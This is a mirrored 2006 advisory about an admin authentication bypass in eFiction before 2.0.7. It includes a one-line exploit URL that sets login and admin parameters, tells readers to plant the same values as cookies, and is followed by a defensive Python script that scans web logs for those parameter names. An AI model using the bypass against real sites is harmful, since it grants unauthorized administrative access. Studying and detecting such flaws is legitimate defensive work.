Computer Security
[EN] securityvulns.ru




From:MILW0RM <submit_(at)_milw0rm.com>
Date:28.08.2006
Subject:eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whoever is defacing websites under my name stop,
since you would gain more notoriety under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use Firefox's extension "Add N Edit Cookies" to add these to your cookies so they stick.
(i.e., instead of $_GET['loggedin'] it's $_COOKIE['loggedin'], which stays with each page)

# milw0rm.com [2006-08-25]
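
For defenders checking web logs for the requests described in this advisory, the following added example (not part of the original advisory and not eFiction code) flags requests that supply the advisory's parameter names in the query string or in the Cookie header. It assumes an Apache combined log with the request Cookie header appended as a final quoted field; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names from the advisory: authentication state that a client
# should never be able to supply.
AUTH_STATE_PARAMS = {"adminloggedin", "loggedin", "level"}

# Assumed layout: combined log format plus a final quoted Cookie field,
# e.g. LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Cookie}i\""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"\s*$'
)

def cookie_names(header):
    """Return the lower-cased cookie names found in a Cookie header value."""
    names = set()
    for part in header.split(";"):
        name, sep, _ = part.strip().partition("=")
        if sep and name:
            names.add(name.lower())
    return names

def inspect(line):
    """Return a finding dict if the request carries auth-state names, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # line does not follow the assumed layout
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    in_query = AUTH_STATE_PARAMS & {k.lower() for k in query}
    in_cookie = AUTH_STATE_PARAMS & cookie_names(m["cookie"])
    if not (in_query or in_cookie):
        return None
    return {"ip": m["ip"], "target": m["target"], "status": int(m["status"]),
            "query": sorted(in_query), "cookie": sorted(in_cookie)}

def scan(lines):
    """Return findings for every suspicious line, in input order."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample input (documentation IP ranges, made-up sizes and session id).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Aug/2006:10:01:02 +0000] "GET /efiction/index.php?adminloggedin=1&loggedin=1&level=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"',
    '198.51.100.7 - - [25/Aug/2006:10:01:09 +0000] "GET /efiction/index.php HTTP/1.1" 200 7300 "-" "Mozilla/5.0" "adminloggedin=1; loggedin=1; level=1"',
    '203.0.113.20 - - [25/Aug/2006:10:02:00 +0000] "GET /efiction/index.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0" "PHPSESSID=abc123"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A name such as "level" can appear legitimately in other applications on the same host, so findings are triage leads rather than confirmed compromises.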

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


